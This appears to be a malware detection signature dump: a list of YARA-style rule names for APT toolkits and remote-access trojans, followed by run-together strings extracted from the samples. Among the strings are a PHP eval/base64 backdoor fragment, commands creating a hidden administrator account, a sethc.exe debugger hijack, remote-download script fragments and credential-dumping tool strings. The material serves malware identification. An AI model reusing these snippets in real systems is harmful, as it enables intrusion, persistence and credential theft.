FlorianRoth/EQGRP_jetplow_SH | FlorianRoth/EQGRP_extrabacon | FlorianRoth/EQGRP_sploit_py | FlorianRoth/EQGRP_BICECREAM | FlorianRoth/EQGRP_StoreFc | FlorianRoth/EQGRP_BARPUNCH_BPICKER | FlorianRoth/EQGRP_pandarock | FlorianRoth/EQGRP_callbacks | FlorianRoth/EQGRP_Unique_Strings | FlorianRoth/EQGRP_RC5_RC6_Opcode | FlorianRoth/OPCLEAVER_BackDoorLogger | FlorianRoth/OPCLEAVER_Jasus | FlorianRoth/OPCLEAVER_NetC | FlorianRoth/OPCLEAVER_ShellCreator2 | FlorianRoth/OPCLEAVER_SmartCopy2 | FlorianRoth/OPCLEAVER_SynFlooder | FlorianRoth/OPCLEAVER_TinyZBot | FlorianRoth/OPCLEAVER_ZhoupinExploitCrew | FlorianRoth/OPCLEAVER_antivirusdetector | FlorianRoth/OPCLEAVER_csext | FlorianRoth/OPCLEAVER_kagent | FlorianRoth/OPCLEAVER_mimikatzWrapper | FlorianRoth/OPCLEAVER_pvz_in | FlorianRoth/OPCLEAVER_pvz_out | FlorianRoth/OPCLEAVER_wndTest | FlorianRoth/OPCLEAVER_zhLookUp | FlorianRoth/OPCLEAVER_zhmimikatz | FlorianRoth/RAT_AAR | FlorianRoth/RAT_Adzok | FlorianRoth/RAT_Ap0calypse | FlorianRoth/RAT_Arcom | FlorianRoth/RAT_BlackNix | FlorianRoth/RAT_BlackShades | FlorianRoth/RAT_BlueBanana | FlorianRoth/RAT_Bozok | FlorianRoth/RAT_ClientMesh | FlorianRoth/RAT_CyberGate | FlorianRoth/RAT_DarkComet | FlorianRoth/RAT_DarkRAT | FlorianRoth/RAT_Greame | FlorianRoth/RAT_HawkEye | FlorianRoth/RAT_Imminent | FlorianRoth/RAT_Infinity | FlorianRoth/RAT_JavaDropper | FlorianRoth/RAT_LostDoor | FlorianRoth/RAT_LuminosityLink | FlorianRoth/RAT_LuxNet | FlorianRoth/RAT_NanoCore | FlorianRoth/RAT_Pandora | FlorianRoth/RAT_Paradox | FlorianRoth/RAT_Plasma | FlorianRoth/RAT_PoisonIvy | FlorianRoth/RAT_PredatorPain | FlorianRoth/RAT_Punisher | FlorianRoth/RAT_PythoRAT | FlorianRoth/RAT_QRat | FlorianRoth/RAT_ShadowTech | FlorianRoth/RAT_SmallNet | FlorianRoth/RAT_SpyGate | FlorianRoth/RAT_Sub7Nation | FlorianRoth/RAT_Vertex | FlorianRoth/RAT_unrecom | FlorianRoth/RAT_xRAT | FlorianRoth/ZxShell_Jul17 | FlorianRoth/Casper_Included_Strings | FlorianRoth/Casper_SystemInformation_Output | 
FlorianRoth/Recon_Commands_Windows_Gen1 | FlorianRoth/FVEY_ShadowBrokers_Jan17_Screen_Strings | FlorianRoth/Furtim_nativeDLL | FlorianRoth/EquationGroup_elgingamble | FlorianRoth/EquationGroup_sambal | FlorianRoth/EquationGroup__jparsescan_parsescan_5 | FlorianRoth/EquationGroup_noclient_3_3_2 | FlorianRoth/EquationGroup_Toolset_Apr17_Gen2 | FlorianRoth/EquationGroup_Toolset_Apr17_ntevt | FlorianRoth/EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld | FlorianRoth/skeleton_key_patcher | FlorianRoth/skeleton_key_injected_code | FlorianRoth/Unit78020_Malware_Gen1 | FlorianRoth/apt_ProjectSauron_encryption | FlorianRoth/APT_Liudoor | FlorianRoth/Certutil_Decode_OR_Download | FlorianRoth/IronPanda_Malware_Htran | FlorianRoth/Locky_Ransomware | FlorianRoth/DeepPanda_htran_exe | FlorianRoth/apt_equation_equationlaser_runtimeclasses | FlorianRoth/apt_equation_cryptotable | FlorianRoth/CrowdStrike_Shamoon_DroppedFile | FlorianRoth/ChinaChopper_Generic | FlorianRoth/Payload_Exe2Hex | FlorianRoth/WaterBug_wipbot_2013_dll | FlorianRoth/WaterBug_turla_dropper | FlorianRoth/apt_hellsing_implantstrings | FlorianRoth/IMPLANT_3_v1 | FlorianRoth/IMPLANT_4_v9 | FlorianRoth/IMPLANT_5_v2 | FlorianRoth/IMPLANT_5_v3 | FlorianRoth/IMPLANT_5_v4 | FlorianRoth/Unidentified_Malware_Two | FlorianRoth/BernhardPOS | FlorianRoth/StuxNet_Malware_1 | FlorianRoth/APT_Project_Sauron_Scripts | FlorianRoth/APT_Project_Sauron_arping_module | FlorianRoth/APT_Project_Sauron_kblogi_module | FlorianRoth/APT_Project_Sauron_basex_module | FlorianRoth/APT_Project_Sauron_dext_module | FlorianRoth/UACME_Akagi | FlorianRoth/REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief | FlorianRoth/REDLEAVES_CoreImplant_UniqueStrings | FlorianRoth/PLUGX_RedLeaves | FlorianRoth/Invoke_mimikittenz | FlorianRoth/Codoso_Gh0st_3 | FlorianRoth/Codoso_Gh0st_1 | FlorianRoth/Codoso_PGV_PVID_3 | FlorianRoth/shimrat | FlorianRoth/shimratreporter | FlorianRoth/WoolenGoldfish_Generic_3 | 
FlorianRoth/apt_nix_elf_Derusbi_Linux_SharedMemCreation | FlorianRoth/apt_nix_elf_Derusbi_Linux_Strings | FlorianRoth/Powerkatz_DLL_Generic | FlorianRoth/apt_RU_MoonlightMaze_customlokitools | FlorianRoth/apt_RU_MoonlightMaze_customsniffer | FlorianRoth/loki2crypto | FlorianRoth/apt_RU_MoonlightMaze_cle_tool | FlorianRoth/apt_RU_MoonlightMaze_xk_keylogger | FlorianRoth/apt_RU_MoonlightMaze_IRIX_exploit_GEN | FlorianRoth/apt_RU_MoonlightMaze_u_logcleaner | FlorianRoth/apt_RU_MoonlightMaze_wipe | FlorianRoth/Trojan_Win32_PlaSrv | FlorianRoth/Trojan_Win32_Platual | FlorianRoth/Trojan_Win32_Plaplex | FlorianRoth/Trojan_Win32_Dipsind_B | FlorianRoth/Trojan_Win32_PlaKeylog_B | FlorianRoth/Trojan_Win32_Adupib | FlorianRoth/Trojan_Win32_PlaLsaLog | FlorianRoth/Trojan_Win32_Plakelog | FlorianRoth/Trojan_Win32_Plainst | FlorianRoth/Trojan_Win32_Plagicom | FlorianRoth/Trojan_Win32_Plaklog | FlorianRoth/Trojan_Win32_Plapiio | FlorianRoth/Trojan_Win32_Plabit | FlorianRoth/Trojan_Win32_Placisc2 | FlorianRoth/Trojan_Win32_Placisc3 | FlorianRoth/Trojan_Win32_Placisc4 |
Strings
		/lib64/ld-linux-x86-64.so.2
libc.so.6
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
C:\\Users\\7\\Desktop\\dll - bak\\Release\\dll.pdbw
TVT DEMOCONFIG-DESTORY\\\\.\\PIPE\\RUN_AT_SESSION (%d)
writedroofiledroocmddrooHideUpdatePzfileHideSysUpfileHideSysCmdDesnation %s is small than finished!
T1Y943jIhk09lkjdsMYGAMEHAVETHISISASUPERNEWGAMENOWBEGINTHIS324NEWGAMEISAPI_CONNECTBD_SOCKBD_DNSPCC_SOCKPCC_PROXYPCC_WEBPROXY?hl=en&q=%s&meta=?hl=en&meta=MirageFox_Server.pdbAVCtest_gagaApp
@net stop seclogonM
}]--X[XA
Word.exeCookie: /search?hl=en=q=%s\\Winsend.d2
TOYOTpipe
+47UGJ(kC#2L#
!%SJa%G1\\\\.\\Pipe\\x141_stdin\\\\.\\Pipe\\x141_stdout\
q0nc9w8edaoiuk2mzrfy3xt1p5ls67g4bvhjdevice_t=MiniAsp
 !"#$%&'()*+,-./0123456789:;3
CreateToolhelp32Snapshot Fail = %d
VST%d.%d.%d.%sW7%d.%d.%d.%scmdshell closedmput over&bingleCreate wpipe failErrCom0\\/*<>|Timeout & QUIT!!!ewr:m:s:h:p:t:b:d:n:w:x:g:k:
abcdefghijkTorNewForUSomething illeagalRundll32 %s,RundllUninstallE
Reqfile not exist!upfile over!
HeartBeat Fail ReConnect.. OK!
*&^%$)*^Asd8623jDs 
%s can't be openednquery cookie failed...query content-length failed...query content-type failed...Current Process id is %dK8DFaGYUs83KF05TGDlet64Esystem32\\drivers\\A-PI.sys===> <Screen%d>N
_BT_VER:1.3.0GetCommandLineGetModuleFileNameAProcess32FirstOpenProcessTerminateProcessCloseHandleProcess32NextSleepSetFileAttributesACopyFileACreateProcessAGetEnvironmentVariableACreateDirectoryARegOpenKeyARegSetValueExARegCloseKeyMessageBoxAGetTempPathAGetTickCounth
`.rdata
@.data
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
info@ibm.com0
copy_file_to_system.exeMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv1)!his=9!wn=!flof=!fil=!ps=I am so sad!I am so happy!JDK541Please input file to bind and destination file name!%[^:]:%d,%d,%drun ok!InstallLocationDisplayVersionDisplayNameWininet.dll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA HttpQueryInfoA InternetReadFile InternetCloseHandle
NtKAtKy
CKxxwN
((((((
)))))))
>>>>>>>
<<<<<<
cmd.exee:\\DebugBmw1.0\\BMW\\release\\Large.pdbc:\\bao\\bmw\\release\\bmw.pdb:\\Bmw(AES)\\BMW\\release\\Large.pdb\\Adobe Gamma Loader.lnk\\HP Printer.lnk%s\\spoolsv.exeREGBIN@
\\sys_log.logpipe\\hE110^^^^^\x00wuacult.txt
Nfcore.dllProcGonfcoreokM
comspec /a /cw
Nfclient.dllRundllInstallARundllUninstallA/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/5.0 (compatible; MSIE 7.0;Windows NT 5.1)1234567890123456\x00ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x00you specify service name not in Svchost
ATI.JO840112-CRAS8468-11150923-PCI8273VPRINCPESPR!NCPESHASTATI\\Temp\\~v3.logBrowser Password Recovery ReportBrowserPasswordDecryptorwww.SecurityXploded.comC:\\Users\\BERNARDINO\\AppData\\Roaming\\berna@consultoreslegales.com.mx (1).pstMail Password Recovery ReportMailPasswordDecryptorC:\\Users\\apant\\Documents\\Programdata\\abacus.ostc
{0112-CRAS8468-
0923-PCI8273VHASTATI.eddgx
{hellor
%sw7e89.tmp%sSVCHOST.exe
%s\\plg%d.nlsRegisteredOwnerRegisteredOrganizationInstallDateI 'll sleep until to restart ...
z:\\Work\\Make Troy\\h
XNtDeviceIoControlFilentdll.dllmswsock.dllC:\\pj\\testing\\testing\\Release\\WhatTheFuckingIsGoingOnHiMan!kingIsGoingOnHiMan!X
/tmp/tmpAddressbook.vcf
NETUT2.dll
roteualPVirtll
oadDLdrLk
escapedll.dllAcroRd32.exeCre'ateToo'lhelp
TASKKILL /F /IM acro*update.cmdSHGetFolderPathj
LOCATESYMBOLMMRECSversionocmdccmdprtscFC001trj:strpsetservfreshservw7v1.2.10http://%s:%d/PUT[%s]/FC001/%sPittyTiger{\\
80340ae9e2fa4b33dbeb07K
-installkys-removekys-startup/c delSelect Files!Bind Success!\\111.dat(*.jpg)|*.jpg|(*.*)|*.*||(*.exe)|*.exe|(*.*)|*.*||chksrv.exeSeDebugPrivilegeNtQueryInformationProcessD
/kys_allow_put.asp?type=/kys_allow_get.asp?name=unsuccessfully!waiting......reboot false!killprocess8;"1-;!.-TTTT
95000000990000009d000000c3000000c7000000cb000000d7000000e5000000Install_EXE.exe
Embedding
StartWork
Shell started,wait to terminate it.....PKsignclass/WritePolicy.classJavaTool.classsbt/compiler/PKm4
LOADER ERROR
CryptUnprotectDatac
3H`>}0N
{KMiOp
 q&|jn
w4^t6q
U<Ru7.G^
:[CSb@
\-----------------------------7d414e351603fa-----------------------------6e8fad908fe13c
zzzzzzzzzz
---HIDEhide---port = %dimagename found at:%sj
cit_ffcookie.modulecit_video.module
botnetcmd:012345678901234567890
Pink.classpopers.classthequickbrownfxjmpsvalzydg\x00
c:\\Users\\helloworld\\EorvhJdqgohvsulqwiphpvhwphpfsbTactXCIHlpTHXAudioEntrycannot judge proxy is availabel or not!open reg for proxyinfo fails!inhp://d=
*&~^%@0hh8979&*^*@~^%9?i0hHostName: %s\x0d\x0aIP: %s\x0d\x0aProxy: %s\x0d\x0aUser: %s\x0d\x0aSystemDir: %s\x0d\x0aOS Language Version: %d\x0d\x0aSystem Version: %d.%d %s (Build %d)\x0d\x0a\x0d\x0aHostNrme: %s\x0d\x0aIP: %s\x0d\x0aProxy: %s\x0d\x0aUser: %s\x0d\x0aSystemDir: %s\x0d\x0aOS Latguage Version: %d\x0d\x0aSystem Version: %d.%d %s (Build %d)\x0d\x0a\x0d\x0a84lL7R"zz*+%+48L8RlL7+-{"z
.NET CLR 2.0.50727) HavijITSecTeam.comr3dm0v3goingbacksoongoingbacksoon1goingbacksoon
this is UP007GetAllBaseInfoMessageLoopZXCVFDSA#$%@MNBKJHUY@#$%wert
14AJuh31415926ExitProcess0
|SBieDll.dllSbieApi_LogSbieDll_Hookm
BinBuckset_Accountset_Passwordset_Usernameset_Descriptionset_DisplayNameset_ServiceNamebadvpn-1Copyright (C) 2010 Ambroz Bizjak <ambrop7@gmail.com>BadVPN udpgwShowNewsIDtvtsvc is running#============Upload Ok !==============##=========Upload Execute Ok !=========##========Update Execute Ok !==========#Process Do not exit in 10 second, so i Kill it!
eRsingScanDELETE-TCBTIME-WAIT1LAST-ACLOSING!FIN!SYN-RECEIV%cget %s 's password error!SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{e3df6b419d1f}<Start Application 2 key><Start Application 1 key><Select Media key><Start Mail key><Play/Pause Media key>0
WlxLoggedOutSASmsgina.dll\\Br0WMinUSerS.DLLp
httpfloodsynfloodudpfloodtcpflooddownandexevisitsocksM
dcd2db91dac7da9f90dc9fcfd6d1d89f8e8d88918f918f918e9f92d19f8a99dcd2db91dac7da9f90dc9fdecbcbcdd6dd9f92d79f9d9acc9d99dcd2db91dac7da9fcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c attrib -h \"%s\"&cmd.exe cmd.exe /c move %s %scmd.exe /c copy %s %scmd.exe /c %s %s RundllInstallA
t[1][not httptunnel][1][httptunnel]downfilecmd /k move \"%s\" \"%s\"ipconfig.exeNetTravlertravlerbackinfoABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-*220d5cc15e7e81002
j\;ql?.
SOFTWARE\\KasperskyLab\\protected\\AVP12\\environmentSOFTWARE\\KasperskyLab\\protected\\AVP9\\settings%SystemRoot%\\System32\\winlogon.execom.apple.PubSabAgent/tmp/screen.jpeg
3& }?iN;=
J7E27B224EA15B787A428DCFE47A7216B3DA9C447AC522DEB"     // Key="system323bcd1fghijklmABCDEFGH-J+LMnopq4stuvwxyzNOPQ7STUVWXYZ0e2ar56R89K/9C886AAD51AC7356"  // key = "hongkongw8rT$3%cnpost^~Qdkwero38oerA^t@#
xt6<m%g7k^D4.7xDtp28i!c3gZ@0*3t@
-----------------------------7db2de21201ba
Cookie: pgv_pvid=%016I64d{E190BC79-02DC-0166-4CF1-BD8F8CB2FF21}index.htm?%016I64dakasha_path: %scycle: %d, sleep time: %dInstallDriver: %d %s(%s)Succeed to drop, please wait for the next payload being loaded.!module mimi!axel url path{
htentjhRTDKjhtenhjhtclkjhkdtnjhtslmj_ghiHIABcdkJYlCnefZajoKLRST9-UV5EFGbm67rP123tusNOwxyz0pDWM48QXqvghiHIABcdkJYlCnefZajoKLRST9-UV5EFGbm67rP123tusNOwxyz0_pDWM48QXqv
.apple
Library/Preferences/com.appleMehrdadU
HTTP/1.0Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6CALLBACK[0]CALLBACK[1]CALLBACK[2]CALLBACK[3]CALLBACK[4]MTBTR-DWEvckpba.dat+RRROR oogin as %sID=%s,OEMCP=%d,ACP=%d002 TERMSRV=%d002 INJECT=%s002 SLEEP=%d002 CBM=%d002 CALLBACK[4]=%s002 CALLBACK[3]=%s002 CALLBACK[2]=%s002 CALLBACK[1]=%s002 CALLBACK[0]=%s002 RAMFree=%dMB002 RAM=%dMB002 CPU=%s002 IpAddress=%s002 Password=%s002 Time=%s002 OEMCP=%d002 OS=%s002 Group=%d002 Image=%d002 Name=%s002 Nick=%s002 Version=%s002 ID=%sStartDocAZwUnmapViewOfSectionNtUnmapViewOfSection<%execute request
samlibSHCreateItemFromParsingName
4930040afec885c975f6itsecteam.comQ29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWspdo=filemanagerAAAIEAqKaqwTXENJw7IrZCX5JTYAVGPA4ZV6pVD3xWrzJhDcPqH2C47tKdWmtf8qh24UhSU3Q0BlcMatZxuibpcWTOS9PvT2yq5LZqJP9uUqiAJHCWS4QHaH/UTQ1ugBhaADImDv+pJAmiPcT3fStY1UwxxbWJy1gNfr6zeq+iYRGrRmc
s:%ddo_scnoforkdefpt
e %c/%d!
mcf892108549c:\\Temp\\ljjjklllllllllllllllllll324234444444444444444444444444fwedssssssslllllllllllljiooooooooooooooooooooooooooooohjknnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn78ghuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuijjjjx.pdb<description>D3scription</description><STRONG>THIS PAGE IS BIG FIND</STRONG>OnThread_PipeServer6B4E2F40B138C4921F1584CA0EFC19EA6B4E2F6B4E2F40%
Microsoft.VisualBasic.ApplicationServiceswLoaderwLoader.g.resourcesExecuteAssemblyByNameGetTypeFromHandleGetManifestResourceNamesInitializeArrayGetManifestResourceStreamAdwind.classextra/Constantes.classdesinstalador/MaDe.adwind%s%dpara1=%dpara2=%dpara3=%dCCommandAttribeCCommandCDCCommandCMDCCommandNopC
Stub.pdbCIE7PasswordsnjLoggertaskmgrkillerabccba%
%s-SN%d-%s%
proxy info is %S %S %S %Sdomian: %S, port: %S, test domain: %Sproxy num: %d, proxy ip: %S, proxy port: %S, proxy user: %S, proxy pass: %Sencode domain: %s
Global\\m324233333p0Global\\mqe45tex13fw14op0Global\\654223411804dWINSUPDATE.TMPwinsups.dllrundll32.exe \"%s\",UpdatePlatformrundll32.exe \"%s\",DisplayIPInjectPkt%
@TCPfFBPIAVWriteMemInjectorAVRemoteThreadAVCommandControllerfoxcon@foxcon.comInstallerFromDll.dllBZh91AY&s
SendThisFile.
InfoHarvesterCmd.dllhavex1312312f
lppe == NULLRunExeCmd.dllM
AATXn+MiwLu+xCoMG7SqY1uQxAk1qLdyoED9LxIVQr2Z/gsrHIsgTvK9AusdFo+9do_pivot(): connections[ix].header.id=%d ix=%dPacket to be bounced too do_pivot: [2] requested %d bytes but got %ddo_pivot(): inconnsistent seq numbers connections[]..seq=%d header.seq=%ddo_pivot(): connections[header.id].header.id=%d header.id=%d!BUG, please report!usage:%s   IP  port [proxip] [port] [key]dw.datsqlpass.dicsql.datfetch.pymethod=POSTCmdPathencoded_pathdata_%d_%d_%d_%d_%d.txt\"-BFr423mI_6uaMtg$bxl\\sd1iU/0ok.cpegBb63-t2p_.rkd0uaeU/x1c$s\\o4ilx\"a-201Mt6b3sI$ /ceBok_i\\m.rdpU4Fulgomv3.a 1%tNd\\4ils60n2Te_w4mei gd2%rob-8pCt1wq_hynlsc0.u9az:\\Projects\\Rescator\\uploader\\Debug\\scheck.pdbS region: found [] bytes of pattern:[CC2 region:CC memregion:KAPTOXA=== pid:scan process with pid for kartoxa and string pattern:scan process with pid for kartoxa:scan all processes for string pattern:GOTIT6I2cn3Sep1 Uio$ra0su\\wO4B:_kDltW/.NSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089get_rscget_kyget_rnponeyhorsechocolatemomoquackD
RapidStartTech.stlIntelRS.exeStealer.Properties.Resources.resources\\Stealer\\obj\\x86\\Release\\Stealer.pdbIntelRapidStart.exeIntelRapidStart.exe.configMSCF
!aaa.gifrundll32 \"%s\" IasAuthIeUishowmsdmoe.dllSavService.exeabcdefhiklmnorstuvwxz1234567890q
ctfmon.exed:\\0.Work\\0.Coding\\0.Workspace\\downLoader\\Release[Proto]  [Local Address]  [L Port]  [Remote Address]  [R Port]  [State]Last-Error Code\x000H
Cookies[\"zWiz\"]IndexOf(\"es-DN\")[\"Keep-Alive\"] == \"320\"PK
META-INFstub.adwindAdwindServer.classUnrecomServer.classInformacion.adwindInstalador.adwindOpcion1.adwindZ
cd46a1a84ba06cea35d5e0219062162f227fdb26%s(error=%d)CAPAPI32OpenService failCreateService failhttp://wpa.qq.com/msgrd?V=1&Uin=312016&Site=WWW.CNASM.COM&Menu=yesexplorer.exehttp://www.cnasm.com/gui/help.htmlhttp://www.cnasm.com/gui/error.htmlC
<B>Login Information Captured</B><BR>User: %s<B>Clipboard Data Captured</B><BR>User: %sRemoteExecWin32_ProcessConnectServerroot\\cimv2ImpersonationLevelvarStoreNumberIntMicrosoft .NET Framework 2.0a: Return type:i
com/androi/config.xml3hb[
k`a`ddi`hllb
klj`nh
Vg71* 
fa5`fd
.jngibd%s\\sa\\saopts.datSpyAgent_HWND32%s\\sacache\\nowin.logSOFTWARE\\Spytech\\SpyAgent ProKeystrokes Typed
 %s (%s)
 %sSpyAgent password has been successfully changed.error: you need to set your SpyAgent password before proceeding.click the \"Set Password\" button in the \"Options\" dialog to set your password!SpyAgent Keystrokes Log Viewerc:\\Source\\SpyAgent7\\Release\\autoi.pdb.
wrong protocol type/post/download/post/echoJ
00-00-00-00-00-00C:\\Users\\ziedpirate.ziedpirate-PC\\Desktop\\sop\\sop\\Release\\(Separate usernames with a comma, or leave blank to monitor all uses.)Input usernames here and separate with a comma. Leave blank to monitor all users.Please Enter Access Password:                             Delivery via Email and FTP3
\x00Sakula\x00
http://%s/%s%u processor:memory (free/total):  %d(Mb)/ %d(Mb)  (use %d:\\BuildSource\\9\\WindowsClient\\WindowsClient.Client.RC\\Binaries\\Win32\\Release DlpHook\\*
LockItTight Agent MonitorLockItTight EngineLockItTight MonitorLastClearingLogLastLogSendTimeStealthUninstallEnableKeyloggingSnapshootsIntervalSendLogPeriodSendLogSMTPSendLogSMTPPortSendLogSizeSendLogLoginPassClearLogsDaysClearLogsMailed OneShell TUHAOISRIGHTo
wmiexec.vbsWMIEXEC ERRORin shell mode, running command background and persistentConnectPort TransmitPortUsage of Pskillwhat user are we bruteforcing[SERVER]connection toUsage of Packet TransmitSof\x00twar\x00e\\Mi\x00cro\x00soft\\Win\x00dows\\Cur\x00rent\x00Vers\x00un\x00Version\\R\x00dows\\Current\x00Software\\Micro\x00/%lu.asp/%lu.txt/index.html?id=%ld\\httpclient.txtAbout hc1host_namehost_portMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)MSUtemp.dbtemp.datFs.OpenTextFile(Server.MapPath(\"online.txt\"),8,True)<%If Session(\"pig\") <> 1 then%>ed132e13d1332bf7e2612a0eb848b30a<title>CR BY
exeHack</title>Copyright &copy; 2006-2009 CR BY
exeHack All Rights Reserved.net user f4cknet localgroup administrators f4ckF4ckF4ckTeam!@#KLn7m5H8rsAa42Vl0T5MrB1L$rndn = Get-Random$wc.Headers.Add(\"Cookie\", \"p=\" + $rndn)
+;Kit.exeself.bat\\asm_driversIIS_TUNNEL_INSTALLERTunnelListen.dllTunnelConnect.dllDcomIISServicerasacd.syskeymmdrvISNCLASDATA_IISDATA_IIS/1/4/ERRORDATA_IIS/1/4/NULLSENDDATATOCONNECTGETDATAFROMCONNECTDATA_IISOK[
[MemLoadLibrary] Code : %I64XGET http://%s:%d/images/%d.asmx?%sPOST http://%s:%d/Service.asmx/%dContent-Type: Appplication/octet-streamg
Y0/j%fO
awL\:6}]27}w
d%J\wM
HG-O0sO
a-Slf=
73r.srn$,,
GetMaingcqcDQBDE@gcqgQYDv_B}E\\DY@\\UuFU^DCC_S[UD***
 outlook.exeProblem %s Report %sIPM.NoteIP..IP..TaskIP..StickyNoteIP..JournalIP..ContactIP..AppointmentIP..Imapsysteminfo /fo tabletasklist /vipconfig /allContent-type: JPEGMicrosoft DH SChannel Cryptographic ProviderNO DATA%d SETIME SUCCESS.M
SHRegSetUSValueWw
pipetemp0oo.oCZCVoCZCVGV&errorlevel=information&wait=yesMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.4344)AppMainServiceMain
_ISTMPGsv ovmtgs lu Xnw ivhfog urov rh aril!%s %s : Hi,my name is %s%szuLmvXlkbNfgvcSPELL-INCANTATION-MAGIC-CHARM-WIZARDRYo
--------------Server Info---------------------------------Soft Info---------------------------------IP Config-------------------------------------------- Ports & Proc -------------------------regrun ok!can't init api\x0d\x0acan't copy file to appdata.%daleady in appdata path.can't get moudule file namecan't find EnvironmentVariableCreateProcess Error ( %d:%s )CreateProcess Success!can't open mmfile %s.%d.%-20s :%-5s %-16s %5d %-s%-4d UDP %-20s :%-5d%-20s :%-5d %-16s %5d %-s%-4d TCP %-20s :%-5d-------------
HTTP://hkmujj.co.cc--------
-------------
HTTP://www.hkmjj.com-------
------
 V1.0---------------------
------
(VC6.0) V1.0------------------
Coded by Ivanlef0u, shadow3 modifiedwindows 2000 sp4 Chinese (before MS07-017)ZwVdmControl -> My Shellcode, modifiable KiServiceTablecall shellcode ... Find GdiTableEntry ... ok!!!
KiServiceTable == %08X
d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbGuiWAng!@#9bd*-a                  add user(admin$/GuiWAng!@#9bd*) to admin[ERR]  get haltable addresss fail[ERR]  get ZwDeviceIoControlFile fail[ERR]  get native function pointers fail
willweiwei
administrator
willweiwei 
t00ls 
[IIS7Up]-->Could not connect to %s[IIS7Up]-->Couldn't create pipe[IIS7Up]-->Error impersonating pipe[IIS7Up]-->Couldn't get token[IIS7Up]-->Got SYSTEM token...[IIS7Up]-->Command: %s[IIS7Up]-->This exploit gives you a Local System shell [IIS7Up]-->Usage: iis7up.exe \"command\" [IIS7Up]-->No command,use WHOAMI [IIS7Up]-->Changing registry values...[IIS7Up]-->Couldn't set registry values[IIS7Up]-->Restoring default registry values...d:\project\
\Source\Churraskito\Release\Churraskito.pdb
/Churraskito/-->This exploit gives you a Local System shell~ MS10_048 X64 EXP        ~
Need a girl to love   QQ 65665651 email master#h4cker.us [ ] Spawning half a shell...Set Fso=server.createobject(\"scr\"&\"ipt\"&\"ing\"&\".\"&\"fil\"&\"esy\"&\"ste\"&\"mob\"&\"jec\"&\"t\")CheckDirIsOKWriteCheckDirIsOKDelBianliA
###Assassin######KamiKaze###chr(rand(97,122))md5(microtime().rand(0,echo \"###uau-repeatwget -U 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) eval(base64_decode($_REQUEST['c_id']))2bd96b5c52d2efd441b75a2617979bdd2b7c84233cd47f142573c18a70ff5770a13756bf1e2bd46921c135232774fc5f36d540721c055de288072d4e16b196dd98f66d46fa71a5fa9b9fcd36aababdae396f72e4974f3e4e2fd7ccffbce9cd7cNot Foun derror was encounteredstopcleandositsoknoproblembro
uploadPOSTURLDownloadToFilereporter.php?msg=&uname=&pword=Technically could be run against remote computers, if allowedD
SOFTWARE\\Borland\\Delphi\\RTLSVW
STMounter.pdbInstall finishZwFuncEntryZCSTEntity.pdbh7834hogus78E
SetElise.pdbEliseDLL.dllESEntryESHandle/
0x01, first info.KSSTCreator.pdbskg(3)=&3.2d_u1
NOKIAN95/WEBERSvmpaIaiMjnagpkvERVaikpaPlvae`ERGkiiej`GkjpvkhhavX
9User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.59 Safari/534.3Accept: text/xml\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nAccept-Encoding: no\\r\\nConnection: Keep-Alive%s/?t=%s&o=%s&i=%s&task_id=%s<XAML></XAML><B6><I6>Pk
printd
E:\\1510prj\\
X-mode: pushX-mode: popProgramm was started at %02i:%02i:%02iS
ShortInfoHarvesterCmd.dllWin32_SystemEnclosureGetFileCmd.dll<
zxcvbnmd
recoder : houdini (c) skype : houdini-fx'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-='=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=response = post (\"is-ready\",\"\")Execute failed!Execute success!Execute success]sres=%ssmac=x-Down(x-DownOnly(x-Exec(x-Delay(D:\\P\\win\\Release\\win.pdbD:\\P\\win\\Release\\s4.pdbCmDsHell.secLoginedQueryTimerIpAddress=%d.%d.%d.%d%s%s%02X-%02X-%02X-%02X-%02X-%02XCommand.comOsVersion=%sLogined=%cMainFilename=%s
netsvcs_0x%dServiceDllSYSTEM\\CurrentControlSet\\Services\\%s\\%sex.dllsystem\\CurrentControlSet\\Services\\%s[Unknown Module]WCE %s (Windows Credentials Editor)Amplia SecurityError: cannot open wce_krbtktswceaux.dll0212DBDHJKSAHD0183923kljmLKL
Neo,welcome to the desert of real.sysin.logsysout.logsystemp.logv1.0v1.0EXFile too big!%sOsInfo.datDon't find cmd.exe,please check again or upload the program!7db30d27130508os32__%d.iniusrer__%d.iniusr32__%d.ini3
\x00cmd.exe\x00\x00sethc.exe\x00\x00debugger\x00\x00SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\x00Set xPost = CreateObject(s1):xPost.Open \"GET\",iRemote,0:xPost.Send()Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()wsh.echo \"Rcmd v1.01 by NetPatch\"wsh.echo \"read.vbs Created!!!\"wsh.echo \"cscript \"&wscript.scriptfullname&\" targetIP username password CommandAuthentication Id:Authentication Package:Authentication Domain:Primary User:* User: * Domain: * Password: -slave-listenwating on port %d...\x0aend waiting2\x0a
